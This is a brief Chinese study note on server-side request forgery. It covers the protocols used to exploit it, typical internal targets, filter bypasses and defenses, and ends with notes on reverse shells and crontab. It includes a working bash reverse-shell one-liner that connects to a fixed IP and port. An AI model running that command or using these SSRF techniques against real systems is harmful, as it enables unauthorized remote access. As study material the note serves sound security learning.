ssrf服务端请求伪造
ssrf是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞,一般情况下,ssrf访问的目标是从外网无法访问的内部系统,正式因为它是由服务端发起的,所以它能请求到它相连而外网隔离的内部系统,ssrf形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制,比如从指定的url地址获取网页文本内容,加载指定地址的图片,下载等等
ssrf利用方式
php协议,读取源码文件,需要file_get_contents
gopher 弹shell
dict 内网服务
file 读取当前服务器文件
http/s 执行http请求,使用http协议访问内网中的web服务
ssrf攻击应用
redis
discuz
fastcgi
内网应用
memcache
绕过
url混淆
ip转化为10进制
防御
限制协议只能为http,https协议
禁止30跳转
设置url白明单或限制内网ip
反弹shell:将目标服务器的终端弹到指定位置,并且需要注意弹出的shell和当前环境有关,比如使用apache服务弹出的shell是www权限
命令 bin/bash -i >& /dev/tcp/192.168.63.128/7999 0>&1
crontab -l 查看当前任务
crontab -e 添加任务
crontab -r 删除任务
linux的计划任务
分钟 :小时 :天: 月 :星期:命令
没有的话就用*表示